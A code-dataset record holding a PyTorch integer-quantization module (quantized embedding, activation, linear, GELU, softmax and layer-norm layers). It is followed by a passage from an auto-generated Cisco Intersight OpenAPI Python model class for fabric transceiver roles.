return torch.round(1.0 / scale * input + zero_point)
def symmetric_linear_quantization_params(
num_bits, saturation_min, saturation_max, per_channel=False
):
with torch.no_grad():
n = 2 ** (num_bits - 1) - 1
if per_channel:
scale, _ = torch.max(
torch.stack([saturation_min.abs(), saturation_max.abs()], dim=1), dim=1
)
scale = torch.clamp(scale, min=1e-8) / n
else:
scale = max(saturation_min.abs(), saturation_max.abs())
scale = torch.clamp(scale, min=1e-8) / n
return scale
class SymmetricQuantFunction(Function):
@staticmethod
def forward(ctx, x, k, percentile_mode, scale):
zero_point = torch.tensor(0.0).to(scale.device)
n = 2 ** (k - 1) - 1
new_quant_x = linear_quantize(x, scale, zero_point, inplace=False)
new_quant_x = torch.clamp(new_quant_x, -n, n - 1)
ctx.scale = scale
return new_quant_x
@staticmethod
def backward(ctx, grad_output):
scale = ctx.scale
if len(grad_output.shape) == 4:
scale = scale.view(-1, 1, 1, 1)
# reshape scale and zeropoint for linear weights
elif len(grad_output.shape) == 2:
scale = scale.view(-1, 1)
else:
scale = scale.view(-1)
return grad_output.clone() / scale, None, None, None, None
class floor_ste(Function):
@staticmethod
def forward(ctx, x):
return torch.floor(x)
@staticmethod
def backward(ctx, grad_output):
return grad_output.clone()
class round_ste(Function):
@staticmethod
def forward(ctx, x):
return torch.round(x)
@staticmethod
def backward(ctx, grad_output):
return grad_output.clone()
def batch_frexp(inputs, max_bit=31):
shape_of_input = inputs.size()
# trans the input to be a 1-d tensor
inputs = inputs.view(-1)
output_m, output_e = np.frexp(inputs.cpu().numpy())
tmp_m = []
for m in output_m:
int_m_shifted = int(
decimal.Decimal(m * (2**max_bit)).quantize(
decimal.Decimal("1"), rounding=decimal.ROUND_HALF_UP
)
)
tmp_m.append(int_m_shifted)
output_m = np.array(tmp_m)
output_e = float(max_bit) - output_e
return (
torch.from_numpy(output_m).to(inputs.device).view(shape_of_input),
torch.from_numpy(output_e).to(inputs.device).view(shape_of_input),
)
class FixedPointMul(Function):
@staticmethod
def forward(
ctx,
pre_act,
pre_act_scaling_factor,
bit_num,
z_scaling_factor,
identity=None,
identity_scaling_factor=None,
):
if len(pre_act_scaling_factor.shape) == 3:
reshape = lambda x: x # noqa: E731
else:
reshape = lambda x: x.view(1, 1, -1) # noqa: E731
ctx.identity = identity
n = 2 ** (bit_num - 1) - 1
with torch.no_grad():
pre_act_scaling_factor = reshape(pre_act_scaling_factor)
if identity is not None:
identity_scaling_factor = reshape(identity_scaling_factor)
ctx.z_scaling_factor = z_scaling_factor
z_int = torch.round(pre_act / pre_act_scaling_factor)
_A = pre_act_scaling_factor.type(torch.double)
_B = (z_scaling_factor.type(torch.float)).type(torch.double)
new_scale = _A / _B
new_scale = reshape(new_scale)
m, e = batch_frexp(new_scale)
output = z_int.type(torch.double) * m.type(torch.double)
output = torch.round(output / (2.0**e))
if identity is not None:
# needs addition of identity activation
wx_int = torch.round(identity / identity_scaling_factor)
_A = identity_scaling_factor.type(torch.double)
_B = (z_scaling_factor.type(torch.float)).type(torch.double)
new_scale = _A / _B
new_scale = reshape(new_scale)
m1, e1 = batch_frexp(new_scale)
output1 = wx_int.type(torch.double) * m1.type(torch.double)
output1 = torch.round(output1 / (2.0**e1))
output = output1 + output
return torch.clamp(output.type(torch.float), -n - 1, n)
@staticmethod
def backward(ctx, grad_output):
identity_grad = None
if ctx.identity is not None:
identity_grad = grad_output.clone() / ctx.z_scaling_factor
return (
grad_output.clone() / ctx.z_scaling_factor,
None,
None,
None,
None,
identity_grad,
None,
)
| 33.934848 | 105 | 0.603831 | import decimal
import numpy as np
import torch
from torch import nn
from torch.autograd import Function
from ...utils import logging
logger = logging.get_logger(__name__)
class QuantEmbedding(qc.Module):
def __init__(
self,
num_embeddings,
embedding_dim,
padding_idx=None,
max_norm=None,
norm_type=2.0,
scale_grad_by_freq=False,
sparse=False,
_weight=None,
weight_bit=8,
momentum=0.95,
quant_mode=False,
):
super().__init__()
self.num_ = num_embeddings
self.dim = embedding_dim
self.padding_idx = padding_idx
self.max_norm = max_norm
self.norm_type = norm_type
self.scale_grad_by_freq = scale_grad_by_freq
self.sparse = sparse
self.weight = nn.Parameter(torch.zeros([num_embeddings, embedding_dim]))
self.register_buffer("weight_scaling_factor", torch.zeros(1))
self.register_buffer("weight_integer", torch.zeros_like(self.weight))
self.weight_bit = weight_bit
self.momentum = momentum
self.quant_mode = quant_mode
self.percentile_mode = False
self.weight_function = SymmetricQuantFunction.apply
def forward(self, x, positions=None, incremental_state=None):
if not self.quant_mode:
return (
F.embedding(
x,
self.weight,
self.padding_idx,
self.max_norm,
self.norm_type,
self.scale_grad_by_freq,
self.sparse,
),
None,
)
w = self.weight
w_transform = w.data.detach()
w_min = w_transform.min().expand(1)
w_max = w_transform.max().expand(1)
self.weight_scaling_factor = symmetric_linear_quantization_params(
self.weight_bit, w_min, w_max, False
)
self.weight_integer = self.weight_function(
self.weight, self.weight_bit, self.percentile_mode, self.weight_scaling_factor
)
emb_int = F.embedding(
x,
self.weight_integer,
self.padding_idx,
self.max_norm,
self.norm_type,
self.scale_grad_by_freq,
self.sparse,
)
return emb_int * self.weight_scaling_factor, self.weight_scaling_factor
class QuantAct(qc.Module):
def __init__(
self,
activation_bit,
act_range_momentum=0.95,
per_channel=False,
channel_len=None,
quant_mode=False,
):
super().__init__()
self.activation_bit = activation_bit
self.act_range_momentum = act_range_momentum
self.quant_mode = quant_mode
self.per_channel = per_channel
self.percentile = False
self.act_function = SymmetricQuantFunction.apply
if not self.per_channel:
self.register_buffer("x_min", torch.zeros(1))
self.register_buffer("x_max", torch.zeros(1))
self.register_buffer("act_scaling_factor", torch.zeros(1))
self.x_min -= 1e-5
self.x_max += 1e-5
else:
raise NotImplementedError("per-channel mode is not currently supported for activation.")
def __repr__(self):
return (
f"{self.__class__.__name__}(activation_bit={self.activation_bit}, "
f"quant_mode: {self.activation_bit}, Act_min: {self.x_min.item():.2f}, "
f"Act_max: {self.x_max.item():.2f})"
)
def forward(
self,
x,
pre_act_scaling_factor=None,
identity=None,
identity_scaling_factor=None,
specified_min=None,
specified_max=None,
):
x_act = x if identity is None else identity + x
if self.training:
assert not self.percentile, "percentile mode is not currently supported for activation."
assert (
not self.per_channel
), "per-channel mode is not currently supported for activation."
x_min = x_act.data.min()
x_max = x_act.data.max()
assert (
x_max.isnan().sum() == 0 and x_min.isnan().sum() == 0
), "NaN detected when computing min/max of the activation"
if self.x_min.min() > -1.1e-5 and self.x_max.max() < 1.1e-5:
self.x_min = self.x_min + x_min
self.x_max = self.x_max + x_max
elif self.act_range_momentum == -1:
self.x_min = torch.min(self.x_min, x_min)
self.x_max = torch.max(self.x_max, x_max)
else:
self.x_min = self.x_min * self.act_range_momentum + x_min * (
1 - self.act_range_momentum
)
self.x_max = self.x_max * self.act_range_momentum + x_max * (
1 - self.act_range_momentum
)
if not self.quant_mode:
return x_act, None
x_min = self.x_min if specified_min is None else specified_min
x_max = self.x_max if specified_max is None else specified_max
self.act_scaling_factor = symmetric_linear_quantization_params(
self.activation_bit, x_min, x_max, per_channel=self.per_channel
)
if pre_act_scaling_factor is None:
quant_act_int = self.act_function(
x, self.activation_bit, self.percentile, self.act_scaling_factor
)
else:
quant_act_int = FixedPointMul.apply(
x,
pre_act_scaling_factor,
self.activation_bit,
self.act_scaling_factor,
identity,
identity_scaling_factor,
)
correct_output_scale = self.act_scaling_factor.view(-1)
return quant_act_int * correct_output_scale, self.act_scaling_factor
class QuantLinear(qc.Module):
def __init__(
self,
in_features,
out_features,
bias=True,
weight_bit=8,
bias_bit=32,
per_channel=False,
quant_mode=False,
):
super().__init__()
self.in_features = in_features
self.out_features = out_features
self.weight = nn.Parameter(torch.zeros([out_features, in_features]))
self.register_buffer("weight_integer", torch.zeros_like(self.weight))
self.register_buffer("fc_scaling_factor", torch.zeros(self.out_features))
if bias:
self.bias = nn.Parameter(torch.zeros(out_features))
self.register_buffer("bias_integer", torch.zeros_like(self.bias))
self.weight_bit = weight_bit
self.quant_mode = quant_mode
self.per_channel = per_channel
self.bias_bit = bias_bit
self.quant_mode = quant_mode
self.percentile_mode = False
self.weight_function = SymmetricQuantFunction.apply
def __repr__(self):
s = super().__repr__()
s = f"({s} weight_bit={self.weight_bit}, quant_mode={self.quant_mode})"
return s
def forward(self, x, prev_act_scaling_factor=None):
if not self.quant_mode:
return F.linear(x, weight=self.weight, bias=self.bias), None
assert prev_act_scaling_factor is not None and prev_act_scaling_factor.shape == (1,), (
"Input activation to the QuantLinear layer should be globally (non-channel-wise) quantized. "
"Please add a QuantAct layer with `per_channel = True` before this QuantAct layer"
)
w = self.weight
w_transform = w.data.detach()
if self.per_channel:
w_min, _ = torch.min(w_transform, dim=1, out=None)
w_max, _ = torch.max(w_transform, dim=1, out=None)
else:
w_min = w_transform.min().expand(1)
w_max = w_transform.max().expand(1)
self.fc_scaling_factor = symmetric_linear_quantization_params(
self.weight_bit, w_min, w_max, self.per_channel
)
self.weight_integer = self.weight_function(
self.weight, self.weight_bit, self.percentile_mode, self.fc_scaling_factor
)
bias_scaling_factor = self.fc_scaling_factor * prev_act_scaling_factor
if self.bias is not None:
self.bias_integer = self.weight_function(
self.bias, self.bias_bit, False, bias_scaling_factor
)
prev_act_scaling_factor = prev_act_scaling_factor.view(1, -1)
x_int = x / prev_act_scaling_factor
return (
F.linear(x_int, weight=self.weight_integer, bias=self.bias_integer)
* bias_scaling_factor,
bias_scaling_factor,
)
class IntGELU(qc.Module):
def __init__(self, quant_mode=True, force_dequant="none"):
super().__init__()
self.quant_mode = quant_mode
if force_dequant in ["nonlinear", "gelu"]:
logger.info("Force dequantize gelu")
self.quant_mode = False
if not self.quant_mode:
self.activation_fn = nn.GELU()
self.k = 1.4142
self.const = 14
self.coeff = [-0.2888, -1.769, 1]
self.coeff[2] /= self.coeff[0]
def int_erf(self, x_int, scaling_factor):
b_int = torch.floor(self.coeff[1] / scaling_factor)
c_int = torch.floor(self.coeff[2] / scaling_factor**2)
sign = torch.sign(x_int)
abs_int = torch.min(torch.abs(x_int), -b_int)
y_int = sign * ((abs_int + b_int) ** 2 + c_int)
scaling_factor = scaling_factor**2 * self.coeff[0]
y_int = floor_ste.apply(y_int / 2**self.const)
scaling_factor = scaling_factor * 2**self.const
return y_int, scaling_factor
def forward(self, x, scaling_factor=None):
if not self.quant_mode:
return self.activation_fn(x), None
x_int = x / scaling_factor
sigmoid_int, sigmoid_scaling_factor = self.int_erf(x_int, scaling_factor / self.k)
shift_int = 1.0 // sigmoid_scaling_factor
x_int = x_int * (sigmoid_int + shift_int)
scaling_factor = scaling_factor * sigmoid_scaling_factor / 2
return x_int * scaling_factor, scaling_factor
class IntSoftmax(qc.Module):
def __init__(self, output_bit, quant_mode=False, force_dequant="none"):
super().__init__()
self.output_bit = output_bit
self.max_bit = 32
self.quant_mode = quant_mode
if force_dequant in ["nonlinear", "softmax"]:
logger.info("Force dequantize softmax")
self.quant_mode = False
self.act = QuantAct(16, quant_mode=self.quant_mode)
self.x0 = -0.6931
self.const = 30
self.coef = [0.35815147, 0.96963238, 1.0]
self.coef[1] /= self.coef[0]
self.coef[2] /= self.coef[0]
def int_polynomial(self, x_int, scaling_factor):
with torch.no_grad():
b_int = torch.floor(self.coef[1] / scaling_factor)
c_int = torch.floor(self.coef[2] / scaling_factor**2)
z = (x_int + b_int) * x_int + c_int
scaling_factor = self.coef[0] * scaling_factor**2
return z, scaling_factor
def int_exp(self, x_int, scaling_factor):
with torch.no_grad():
x0_int = torch.floor(self.x0 / scaling_factor)
x_int = torch.max(x_int, self.const * x0_int)
q = floor_ste.apply(x_int / x0_int)
r = x_int - x0_int * q
exp_int, exp_scaling_factor = self.int_polynomial(r, scaling_factor)
exp_int = torch.clamp(floor_ste.apply(exp_int * 2 ** (self.const - q)), min=0)
scaling_factor = exp_scaling_factor / 2**self.const
return exp_int, scaling_factor
def forward(self, x, scaling_factor):
if not self.quant_mode:
return F.softmax(x, dim=-1), None
x_int = x / scaling_factor
x_int_max, _ = x_int.max(dim=-1, keepdim=True)
x_int = x_int - x_int_max
exp_int, exp_scaling_factor = self.int_exp(x_int, scaling_factor)
exp, exp_scaling_factor = self.act(exp_int, exp_scaling_factor)
exp_int = exp / exp_scaling_factor
exp_int_sum = exp_int.sum(dim=-1, keepdim=True)
factor = floor_ste.apply(2**self.max_bit / exp_int_sum)
exp_int = floor_ste.apply(exp_int * factor / 2 ** (self.max_bit - self.output_bit))
scaling_factor = 1 / 2**self.output_bit
return exp_int * scaling_factor, scaling_factor
class IntLayerNorm(qc.Module):
def __init__(self, normalized_shape, eps, output_bit=8, quant_mode=False, force_dequant="none"):
super().__init__()
self.normalized_shape = normalized_shape
self.eps = eps
self.weight = nn.Parameter(torch.zeros(normalized_shape))
self.bias = nn.Parameter(torch.zeros(normalized_shape))
self.quant_mode = quant_mode
if force_dequant in ["nonlinear", "layernorm"]:
logger.info("Force dequantize layernorm")
self.quant_mode = False
self.register_buffer("shift", torch.zeros(1))
self.output_bit = output_bit
self.max_bit = 32
self.dim_sqrt = None
self.activation = QuantAct(self.output_bit, quant_mode=self.quant_mode)
def set_shift(self, y_int):
with torch.no_grad():
y_sq_int = y_int**2
var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
shift = (torch.log2(torch.sqrt(var_int / 2**self.max_bit)).ceil()).max()
shift_old = self.shift
self.shift = torch.max(self.shift, shift)
logger.info(f"Dynamic shift adjustment: {int(shift_old)} to {int(self.shift)}")
def overflow_fallback(self, y_int):
self.set_shift(y_int)
y_int_shifted = floor_ste.apply(y_int / 2**self.shift)
y_sq_int = y_int_shifted**2
var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
return var_int
def forward(self, x, scaling_factor=None):
if not self.quant_mode:
mean = x.mean(axis=2, keepdim=True)
y = x - mean
var = torch.mean(y**2, axis=2, keepdim=True)
x = y / torch.sqrt(self.eps + var)
x = x * self.weight + self.bias
return x, None
if self.dim_sqrt is None:
n = torch.tensor(x.shape[2], dtype=torch.float)
self.dim_sqrt = torch.sqrt(n).to(x.device)
x_int = x / scaling_factor
mean_int = round_ste.apply(x_int.mean(axis=2, keepdim=True))
y_int = x_int - mean_int
y_int_shifted = floor_ste.apply(y_int / 2**self.shift)
y_sq_int = y_int_shifted**2
var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
if self.training:
if var_int.max() >= 2**self.max_bit:
var_int = self.overflow_fallback(y_int)
assert var_int.max() < 2**self.max_bit + 0.1, (
"Error detected in overflow handling: "
"`var_int` exceeds `self.max_bit` (the maximum possible bit width)"
)
std_int = floor_ste.apply(torch.sqrt(var_int)) * 2**self.shift
factor = floor_ste.apply(2**31 / std_int)
y_int = floor_ste.apply(y_int * factor / 2)
scaling_factor = self.dim_sqrt / 2**30
bias = self.bias.data.detach() / (self.weight.data.detach())
bias_int = floor_ste.apply(bias / scaling_factor)
y_int = y_int + bias_int
scaling_factor = scaling_factor * self.weight
x = y_int * scaling_factor
return x, scaling_factor
def get_percentile_min_max(input, lower_percentile, upper_percentile, output_tensor=False):
input_length = input.shape[0]
lower_index = round(input_length * (1 - lower_percentile * 0.01))
upper_index = round(input_length * upper_percentile * 0.01)
upper_bound = torch.kthvalue(input, k=upper_index).values
if lower_percentile == 0:
lower_bound = upper_bound * 0
else:
lower_bound = -torch.kthvalue(-input, k=lower_index).values
if not output_tensor:
lower_bound = lower_bound.item()
upper_bound = upper_bound.item()
return lower_bound, upper_bound
def linear_quantize(input, scale, zero_point, inplace=False):
if len(input.shape) == 4:
scale = scale.view(-1, 1, 1, 1)
zero_point = zero_point.view(-1, 1, 1, 1)
elif len(input.shape) == 2:
scale = scale.view(-1, 1)
zero_point = zero_point.view(-1, 1)
else:
scale = scale.view(-1)
zero_point = zero_point.view(-1)
if inplace:
input.mul_(1.0 / scale).add_(zero_point).round_()
return input
return torch.round(1.0 / scale * input + zero_point)
def symmetric_linear_quantization_params(
num_bits, saturation_min, saturation_max, per_channel=False
):
with torch.no_grad():
n = 2 ** (num_bits - 1) - 1
if per_channel:
scale, _ = torch.max(
torch.stack([saturation_min.abs(), saturation_max.abs()], dim=1), dim=1
)
scale = torch.clamp(scale, min=1e-8) / n
else:
scale = max(saturation_min.abs(), saturation_max.abs())
scale = torch.clamp(scale, min=1e-8) / n
return scale
class SymmetricQuantFunction(Function):
@staticmethod
def forward(ctx, x, k, percentile_mode, scale):
zero_point = torch.tensor(0.0).to(scale.device)
n = 2 ** (k - 1) - 1
new_quant_x = linear_quantize(x, scale, zero_point, inplace=False)
new_quant_x = torch.clamp(new_quant_x, -n, n - 1)
ctx.scale = scale
return new_quant_x
@staticmethod
def backward(ctx, grad_output):
scale = ctx.scale
if len(grad_output.shape) == 4:
scale = scale.view(-1, 1, 1, 1)
elif len(grad_output.shape) == 2:
scale = scale.view(-1, 1)
else:
scale = scale.view(-1)
return grad_output.clone() / scale, None, None, None, None
class floor_ste(Function):
@staticmethod
def forward(ctx, x):
return torch.floor(x)
@staticmethod
def backward(ctx, grad_output):
return grad_output.clone()
class round_ste(Function):
@staticmethod
def forward(ctx, x):
return torch.round(x)
@staticmethod
def backward(ctx, grad_output):
return grad_output.clone()
def batch_frexp(inputs, max_bit=31):
shape_of_input = inputs.size()
inputs = inputs.view(-1)
output_m, output_e = np.frexp(inputs.cpu().numpy())
tmp_m = []
for m in output_m:
int_m_shifted = int(
decimal.Decimal(m * (2**max_bit)).quantize(
decimal.Decimal("1"), rounding=decimal.ROUND_HALF_UP
)
)
tmp_m.append(int_m_shifted)
output_m = np.array(tmp_m)
output_e = float(max_bit) - output_e
return (
torch.from_numpy(output_m).to(inputs.device).view(shape_of_input),
torch.from_numpy(output_e).to(inputs.device).view(shape_of_input),
)
class FixedPointMul(Function):
@staticmethod
def forward(
ctx,
pre_act,
pre_act_scaling_factor,
bit_num,
z_scaling_factor,
identity=None,
identity_scaling_factor=None,
):
if len(pre_act_scaling_factor.shape) == 3:
reshape = lambda x: x
else:
reshape = lambda x: x.view(1, 1, -1)
ctx.identity = identity
n = 2 ** (bit_num - 1) - 1
with torch.no_grad():
pre_act_scaling_factor = reshape(pre_act_scaling_factor)
if identity is not None:
identity_scaling_factor = reshape(identity_scaling_factor)
ctx.z_scaling_factor = z_scaling_factor
z_int = torch.round(pre_act / pre_act_scaling_factor)
_A = pre_act_scaling_factor.type(torch.double)
_B = (z_scaling_factor.type(torch.float)).type(torch.double)
new_scale = _A / _B
new_scale = reshape(new_scale)
m, e = batch_frexp(new_scale)
output = z_int.type(torch.double) * m.type(torch.double)
output = torch.round(output / (2.0**e))
if identity is not None:
wx_int = torch.round(identity / identity_scaling_factor)
_A = identity_scaling_factor.type(torch.double)
_B = (z_scaling_factor.type(torch.float)).type(torch.double)
new_scale = _A / _B
new_scale = reshape(new_scale)
m1, e1 = batch_frexp(new_scale)
output1 = wx_int.type(torch.double) * m1.type(torch.double)
output1 = torch.round(output1 / (2.0**e1))
output = output1 + output
return torch.clamp(output.type(torch.float), -n - 1, n)
@staticmethod
def backward(ctx, grad_output):
identity_grad = None
if ctx.identity is not None:
identity_grad = grad_output.clone() / ctx.z_scaling_factor
return (
grad_output.clone() / ctx.z_scaling_factor,
None,
None,
None,
None,
identity_grad,
None,
)
| true | true |
f71918cfc24775f026b1e9e604deca5c1ed4179d | 18,802 | py | Python | intersight/model/fabric_transceiver_role.py | CiscoDevNet/intersight-python | 04b721f37c3044646a91c185c7259edfb991557a | [
"Apache-2.0"
] | 5 | 2021-12-16T15:13:32.000Z | 2022-03-29T16:09:54.000Z | intersight/model/fabric_transceiver_role.py | CiscoDevNet/intersight-python | 04b721f37c3044646a91c185c7259edfb991557a | [
"Apache-2.0"
] | 4 | 2022-01-25T19:05:51.000Z | 2022-03-29T20:18:37.000Z | intersight/model/fabric_transceiver_role.py | CiscoDevNet/intersight-python | 04b721f37c3044646a91c185c7259edfb991557a | [
"Apache-2.0"
] | 2 | 2020-07-07T15:01:08.000Z | 2022-01-31T04:27:35.000Z | """
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. The Intersight OpenAPI document defines the complete set of properties that are returned in the HTTP response. From that perspective, a client can expect that no additional properties are returned, unless these properties are explicitly defined in the OpenAPI document. However, when a client uses an older version of the Intersight OpenAPI document, the server may send additional properties because the software is more recent than the client. In that case, the client may receive properties that it does not know about. Some generated SDKs perform a strict validation of the HTTP response body against the OpenAPI document. # noqa: E501
The version of the OpenAPI document: 1.0.9-4950
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from intersight.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from intersight.model.display_names import DisplayNames
from intersight.model.fabric_appliance_role import FabricApplianceRole
from intersight.model.fabric_fcoe_uplink_role import FabricFcoeUplinkRole
from intersight.model.fabric_port_policy_relationship import FabricPortPolicyRelationship
from intersight.model.fabric_port_role import FabricPortRole
from intersight.model.fabric_transceiver_role_all_of import FabricTransceiverRoleAllOf
from intersight.model.fabric_uplink_role import FabricUplinkRole
from intersight.model.mo_base_mo_relationship import MoBaseMoRelationship
from intersight.model.mo_tag import MoTag
from intersight.model.mo_version_context import MoVersionContext
globals()['DisplayNames'] = DisplayNames
globals()['FabricApplianceRole'] = FabricApplianceRole
globals()['FabricFcoeUplinkRole'] = FabricFcoeUplinkRole
globals()['FabricPortPolicyRelationship'] = FabricPortPolicyRelationship
globals()['FabricPortRole'] = FabricPortRole
globals()['FabricTransceiverRoleAllOf'] = FabricTransceiverRoleAllOf
globals()['FabricUplinkRole'] = FabricUplinkRole
globals()['MoBaseMoRelationship'] = MoBaseMoRelationship
globals()['MoTag'] = MoTag
globals()['MoVersionContext'] = MoVersionContext
class FabricTransceiverRole(ModelComposed):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
('class_id',): {
'APPLIANCEROLE': "fabric.ApplianceRole",
'FCOEUPLINKROLE': "fabric.FcoeUplinkRole",
'UPLINKROLE': "fabric.UplinkRole",
},
('object_type',): {
'APPLIANCEROLE': "fabric.ApplianceRole",
'FCOEUPLINKROLE': "fabric.FcoeUplinkRole",
'UPLINKROLE': "fabric.UplinkRole",
},
('admin_speed',): {
'AUTO': "Auto",
'1GBPS': "1Gbps",
'10GBPS': "10Gbps",
'25GBPS': "25Gbps",
'40GBPS': "40Gbps",
'100GBPS': "100Gbps",
},
('fec',): {
'AUTO': "Auto",
'CL91': "Cl91",
'CL74': "Cl74",
},
}
validations = {
('aggregate_port_id',): {
'inclusive_maximum': 108,
'inclusive_minimum': 0,
},
('port_id',): {
'inclusive_maximum': 108,
'inclusive_minimum': 1,
},
('slot_id',): {
'inclusive_maximum': 5,
'inclusive_minimum': 1,
},
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'class_id': (str,), # noqa: E501
'object_type': (str,), # noqa: E501
'admin_speed': (str,), # noqa: E501
'fec': (str,), # noqa: E501
'account_moid': (str,), # noqa: E501
'create_time': (datetime,), # noqa: E501
'domain_group_moid': (str,), # noqa: E501
'mod_time': (datetime,), # noqa: E501
'moid': (str,), # noqa: E501
'owners': ([str], none_type,), # noqa: E501
'shared_scope': (str,), # noqa: E501
'tags': ([MoTag], none_type,), # noqa: E501
'version_context': (MoVersionContext,), # noqa: E501
'ancestors': ([MoBaseMoRelationship], none_type,), # noqa: E501
'parent': (MoBaseMoRelationship,), # noqa: E501
'permission_resources': ([MoBaseMoRelationship], none_type,), # noqa: E501
'display_names': (DisplayNames,), # noqa: E501
'aggregate_port_id': (int,), # noqa: E501
'port_id': (int,), # noqa: E501
'slot_id': (int,), # noqa: E501
'port_policy': (FabricPortPolicyRelationship,), # noqa: E501
}
@cached_property
def discriminator():
lazy_import()
val = {
'fabric.ApplianceRole': FabricApplianceRole,
'fabric.FcoeUplinkRole': FabricFcoeUplinkRole,
'fabric.UplinkRole': FabricUplinkRole,
}
if not val:
return None
return {'class_id': val}
attribute_map = {
'class_id': 'ClassId', # noqa: E501
'object_type': 'ObjectType', # noqa: E501
'admin_speed': 'AdminSpeed', # noqa: E501
'fec': 'Fec', # noqa: E501
'account_moid': 'AccountMoid', # noqa: E501
'create_time': 'CreateTime', # noqa: E501
'domain_group_moid': 'DomainGroupMoid', # noqa: E501
'mod_time': 'ModTime', # noqa: E501
'moid': 'Moid', # noqa: E501
'owners': 'Owners', # noqa: E501
'shared_scope': 'SharedScope', # noqa: E501
'tags': 'Tags', # noqa: E501
'version_context': 'VersionContext', # noqa: E501
'ancestors': 'Ancestors', # noqa: E501
'parent': 'Parent', # noqa: E501
'permission_resources': 'PermissionResources', # noqa: E501
'display_names': 'DisplayNames', # noqa: E501
'aggregate_port_id': 'AggregatePortId', # noqa: E501
'port_id': 'PortId', # noqa: E501
'slot_id': 'SlotId', # noqa: E501
'port_policy': 'PortPolicy', # noqa: E501
}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
'_composed_instances',
'_var_name_to_model_instances',
'_additional_properties_model_instances',
])
@convert_js_args_to_python_args
def __init__(self, class_id, object_type, *args, **kwargs): # noqa: E501
"""FabricTransceiverRole - a model defined in OpenAPI
Args:
class_id (str): The fully-qualified name of the instantiated, concrete type. This property is used as a discriminator to identify the type of the payload when marshaling and unmarshaling data. The enum values provides the list of concrete types that can be instantiated from this abstract type.
object_type (str): The fully-qualified name of the instantiated, concrete type. The value should be the same as the 'ClassId' property. The enum values provides the list of concrete types that can be instantiated from this abstract type.
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
admin_speed (str): Admin configured speed for the port. * `Auto` - Admin configurable speed AUTO ( default ). * `1Gbps` - Admin configurable speed 1Gbps. * `10Gbps` - Admin configurable speed 10Gbps. * `25Gbps` - Admin configurable speed 25Gbps. * `40Gbps` - Admin configurable speed 40Gbps. * `100Gbps` - Admin configurable speed 100Gbps.. [optional] if omitted the server will use the default value of "Auto" # noqa: E501
fec (str): Forward error correction configuration for the port. * `Auto` - Forward error correction option 'Auto'. * `Cl91` - Forward error correction option 'cl91'. * `Cl74` - Forward error correction option 'cl74'.. [optional] if omitted the server will use the default value of "Auto" # noqa: E501
account_moid (str): The Account ID for this managed object.. [optional] # noqa: E501
create_time (datetime): The time when this managed object was created.. [optional] # noqa: E501
domain_group_moid (str): The DomainGroup ID for this managed object.. [optional] # noqa: E501
mod_time (datetime): The time when this managed object was last modified.. [optional] # noqa: E501
moid (str): The unique identifier of this Managed Object instance.. [optional] # noqa: E501
owners ([str], none_type): [optional] # noqa: E501
shared_scope (str): Intersight provides pre-built workflows, tasks and policies to end users through global catalogs. Objects that are made available through global catalogs are said to have a 'shared' ownership. Shared objects are either made globally available to all end users or restricted to end users based on their license entitlement. Users can use this property to differentiate the scope (global or a specific license tier) to which a shared MO belongs.. [optional] # noqa: E501
tags ([MoTag], none_type): [optional] # noqa: E501
version_context (MoVersionContext): [optional] # noqa: E501
ancestors ([MoBaseMoRelationship], none_type): An array of relationships to moBaseMo resources.. [optional] # noqa: E501
parent (MoBaseMoRelationship): [optional] # noqa: E501
permission_resources ([MoBaseMoRelationship], none_type): An array of relationships to moBaseMo resources.. [optional] # noqa: E501
display_names (DisplayNames): [optional] # noqa: E501
